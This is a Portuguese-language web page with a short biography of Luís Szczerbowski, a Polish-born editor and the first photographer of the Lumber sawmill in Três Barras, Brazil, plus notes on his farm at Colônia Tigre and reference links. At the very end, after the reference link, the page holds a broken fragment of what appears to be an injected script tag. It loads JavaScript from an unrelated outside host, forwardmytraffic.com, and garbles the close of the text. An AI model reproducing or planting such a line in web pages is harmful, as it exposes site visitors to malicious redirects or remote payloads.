Luís Szczerbowski, nascido na Polônia, em 17 de agosto de 1883, veio para o Brasil por volta de 1900. Foi editor do jornal Naród (O povo) em Curitiba. Poliglota, falava e escrevia nos idiomas polaco, russo, alemão, inglês e português. No município de Três Barras, trabalhou na serraria Lumber, como apontador e vendedor de terras, sendo o primeiro fotógrafo a registrar as atividades da empresa americana.
O Fotógrafo
A história da família Szczerbowski está atrelada a Colônia Tigre e a serraria Lumber. Na propriedade da família é possível encontrar vestígios dos “tempos” da Lumber.
Colônia Tigre
Luis Szczerbowski, empreendedor, teve seus primeiros implementos agrícolas trazidos da Eslováquia. Formou um pomar com sementes importadas produzindo frutas e verduras de excelente qualidade. Instalou na Colônia Tigre um gerador elétrico e um moinho colonial movido com força hidráulica para moer trigo, centeio, milho, tafona de farinha de mandioca e polvilho, descascador de arroz, picador de palha. Teve ainda um apiário, além da fábrica de cigarros e na vila tresbarrense um ponto de comércio.
Com certeza, o nome de Luis Szczerbowski merece destaque na memória histórica tresbarrense.
Para saber mais:
Entrevista completa editada: https://www.ecosdocontestado.com/memorias
Artigo: LIMA, Soeli Regina. O acervo fotográfico de Luis Szczerbowski: fragmentos da memória. IN: Revista Memória em Rede. v. 8, p. 169-175, 2016. Disponível: https://docs.wixstatic.com/ugd/111853_bd505fbfe48d4db893a12e1b2a8daefa.pdf… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>